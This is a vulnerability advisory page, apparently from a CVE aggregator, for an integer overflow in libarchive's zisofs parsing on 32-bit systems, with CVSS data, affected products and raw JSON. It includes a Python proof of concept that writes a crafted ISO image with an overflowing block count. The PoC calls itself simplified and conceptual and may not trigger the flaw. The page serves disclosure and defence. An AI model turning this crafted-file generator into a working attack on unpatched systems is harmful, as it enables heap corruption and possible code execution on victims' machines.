Security Vulnerability Report
CVE-2026-5121 CVSS 7.5 HIGH

Published: 2026-03-30 08:16:19
Last Modified: 2026-05-21 04:16:31

Description

A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:libarchive:libarchive:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
libarchive (32-bit systems)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct


def create_malicious_iso(filename):
    """
    Conceptual PoC for CVE-2026-5121
    This script generates a crafted ISO9660 image intended to trigger
    an integer overflow in the zisofs block pointer allocation logic
    within libarchive on 32-bit systems.
    """
    with open(filename, 'wb') as f:
        # 1. Write a dummy System Area (32768 bytes)
        f.write(b'\x00' * 32768)

        # 2. Write a simplified Primary Volume Descriptor (PVD)
        # Type 1 (PVD), Standard ID "CD001", Version 1
        pvd = b'\x01' + b'CD001' + b'\x01'
        pvd += b'\x00' * (2048 - len(pvd))
        f.write(pvd)

        # 3. Simulate Zisofs header/location
        # In a real exploit, this data would be placed where libarchive
        # expects the Zisofs block pointer table.
        # Seek to a hypothetical offset (simplified)
        f.write(b'\x00' * 2048)

        # "ziso" magic identifier (often used in zisofs)
        f.write(b'ziso')

        # Block size (e.g., 0x8000 is 32KB)
        f.write(struct.pack('<I', 0x8000))

        # Number of blocks: Set to a value that causes integer overflow
        # on 32-bit systems when calculating allocation size.
        # Calculation in libarchive: count * 4 (size of pointer)
        # If count = 0x40000000, then 0x40000000 * 4 = 0 (overflow)
        # This results in malloc(0) or a very small buffer.
        malicious_block_count = 0x40000000
        f.write(struct.pack('<I', malicious_block_count))

        # Write dummy data to fill the file
        f.write(b'A' * 1024)

    print(f"[+] Crafted ISO file created: {filename}")
    print("[+] Attempting to trigger integer overflow in libarchive zisofs parsing.")


if __name__ == "__main__":
    create_malicious_iso("cve_2026_5121_poc.iso")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5121", "sourceIdentifier": "[email protected]", "published": "2026-03-30T08:16:18.780", "lastModified": "2026-05-21T04:16:31.343", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system."}, {"lang": "es", "value": "Se encontró un fallo en libarchive. En sistemas de 32 bits, existe una vulnerabilidad de desbordamiento de entero en la lógica de asignación de punteros de bloque zisofs. Un atacante remoto puede explotar esto al proporcionar una imagen ISO9660 especialmente diseñada, lo que puede llevar a un desbordamiento de búfer de pila. Esto podría permitir potencialmente la ejecución de código arbitrario en el sistema afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, 
"impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libarchive:libarchive:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A51945D-40D7-4C28-B0BB-774687265DCE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:10065", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:10097", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:11768", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12071", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12274", "source": 
"[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:13812", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14773", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14937", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:15087", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16008", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16009", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16030", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16174", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:17596", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19724", "source": "[email protected]"}, {"url": "https://access.redh ... (truncated)